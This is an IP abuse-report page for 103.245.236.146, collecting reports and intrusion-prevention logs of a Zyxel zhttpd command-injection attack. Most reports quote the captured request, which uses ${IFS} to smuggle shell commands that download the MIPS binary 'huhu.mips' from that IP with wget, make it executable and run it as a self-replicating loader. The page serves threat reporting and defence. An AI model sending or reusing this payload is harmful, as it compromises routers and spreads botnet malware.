This IP address has been reported a total of
33
times from
17 distinct
sources.
103.245.236.146 was first reported on
, and the most recent report was
.
Old Reports:
The most recent abuse report for this IP address is from
. It is possible that this IP is no longer involved in abusive activities.
/bin/zhttpd/$%7BIFS%7Dcd$%7BIFS%7D/tmp;$%7BIFS%7Drm$%7BIFS%7D-rf$%7BIFS%7D*mips*;$%7BIFS%7Dwget$%7BI ...
show more/bin/zhttpd/$%7BIFS%7Dcd$%7BIFS%7D/tmp;$%7BIFS%7Drm$%7BIFS%7D-rf$%7BIFS%7D*mips*;$%7BIFS%7Dwget$%7BIFS%7Dhttp://103.245.236.146/huhu.mips;$%7BIFS%7Dchmod$%7BIFS%7D777$%7BIFS%7Dhuhu.mips;$%7BIFS%7D./huhu.mips$%7BIFS%7Dzyxel.selfrep;
show less
/bin/zhttpd/${IFS}cd${IFS}/tmp ${IFS}rm${IFS}-rf${IFS}*mips* ${IFS}wget${IFS}http://103.245.236.146/ ...
show more/bin/zhttpd/${IFS}cd${IFS}/tmp ${IFS}rm${IFS}-rf${IFS}*mips* ${IFS}wget${IFS}http://103.245.236.146/huhu.mips ${IFS}chmod${IFS}777${IFS}huhu.mips ${IFS}./huhu.mips${IFS}zyxel.selfrep
show less
Hacking
Anonymous
Policy Type policy Attack Name Zyxel.zhttpd.Webserver.Command.Injection
Source Port 48949 Destinati ...
show morePolicy Type policy Attack Name Zyxel.zhttpd.Webserver.Command.Injection
Source Port 48949 Destination Port 443
URL /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep; Direction outgoing
Attack ID 53200 Profile LINUX_IPS
Reference http://www.fortinet.com/ids/VID53200 Incident Serial No. 364693770
Message applications3: Zyxel.zhttpd.Webserver.Command.Injection Threat Score 50
Threat 4096 Threat Level critical
show less
Hacking
SQL Injection
Brute-Force
Exploited Host
Web App Attack
Anonymous
GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236. ...
show moreGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep; from 157.231.51.20
show less
Exploited Host
Web App Attack
Anonymous
Malware is to be loaded from this IP. URI "/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mi ...
show moreMalware is to be loaded from this IP. URI "/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;"
show less
spam or other hacking activities reported by webbfabriken security servers
Attack reported by Webbf ...
show morespam or other hacking activities reported by webbfabriken security servers
Attack reported by Webbfabiken Security API - WFSecAPI
show less
Web Spam
Anonymous
Protocol 6 Service HTTP
Policy ID 1 Policy UUID 298b30a0-d23b-51ed-5461-f16f26e426bc
Policy Type p ...
show moreProtocol 6 Service HTTP
Policy ID 1 Policy UUID 298b30a0-d23b-51ed-5461-f16f26e426bc
Policy Type policy Attack Name Zyxel.zhttpd.Webserver.Command.Injection
Source Port 40511 Destination Port 443
URL /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep; Direction outgoing
Attack ID 53200 Profile LINUX_IPS
Reference http://www.fortinet.com/ids/VID53200 Incident Serial No. 289427070
Message applications3: Zyxel.zhttpd.Webserver.Command.Injection Threat Score 50
Threat 4096 Threat Level critical
show less
Web App Attack
Anonymous
Host Malware, possibly china made ioT firmware hack.